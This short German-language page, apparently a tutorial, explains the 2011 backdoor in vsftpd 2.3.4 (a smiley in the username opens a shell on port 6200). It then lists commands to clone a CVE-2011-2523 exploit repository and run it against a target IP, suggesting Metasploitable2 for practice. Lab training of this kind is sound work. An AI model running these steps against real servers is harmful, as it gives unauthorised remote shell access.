
Python-Exploit für vsftpd 2.3.4 - Backdoor-Befehlsausführung
Very Secure FTP Daemon (vsftpd) ist ein FTP-Server für Unix-ähnliche Plattformen, einschließlich Linux. Er wird unter den Bedingungen der GNU General Public Licence vertrieben. Er unterstützt IPv6 sowie SSL.
Im Juli 2011 wurde bekannt, dass vsftpd Version 2.3.4, die von der Hauptseite heruntergeladen werden konnte, kompromittiert worden war. Benutzer, die sich auf einem gehackten vsftpd-2.3.4-Server anmelden, können eine Befehlsshell auf Port 6200 erhalten, indem sie ein:) Smiley als Benutzername eingeben. Dies war kein Sicherheitsfehler in vsftpd; vielmehr hatte jemand eine separate Version von vsftpd hochgeladen, die eine Hintertür enthielt. Die Seite wurde inzwischen auf Google App Engine migriert.
sudo apt update
sudo apt install python3
sudo apt install python3-pip
pip install argparse
git clone https://github.com/Lynk4/CVE-2011-2523.git
cd ./CVE-2011-2523
chmod +x exploit.py
python3 exploit.py -host Ziel_IP

Sie können den Exploit auf Metasploitable2 testen.